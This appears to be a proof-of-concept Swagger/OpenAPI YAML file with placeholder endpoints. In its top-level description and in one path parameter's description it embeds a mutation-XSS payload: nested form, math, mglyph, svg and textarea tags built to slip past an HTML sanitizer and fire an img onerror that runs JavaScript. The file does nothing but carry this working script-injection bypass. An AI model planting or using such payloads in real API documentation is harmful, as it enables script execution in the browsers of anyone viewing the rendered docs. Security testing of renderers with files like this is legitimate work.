---
swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.domain) src>"></form>

  version: production
basePath: https://tempest.com.br
produces:
- application/xml
- application/json
consumes:
- application/xml
- application/json
security:
- basicAuth: []
paths:
  "/fake_path":
    get:
      responses:
        '200':
          description: No response was specified
      tags:
      - somettext
      operationId: findAccounts
      summary: this is example text
  "/fake_path_tempest":
    delete:
      parameters:
      - description: |
          <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.domain) src>"></form>

        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: No response was specified
      tags:
      - afine
      operationId: afine
      summary: afine
    get:
      parameters:
      - description: this is example text
        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: No response was specified
      tags:
      - afine
      operationId: some_operation
      summary: this is example text
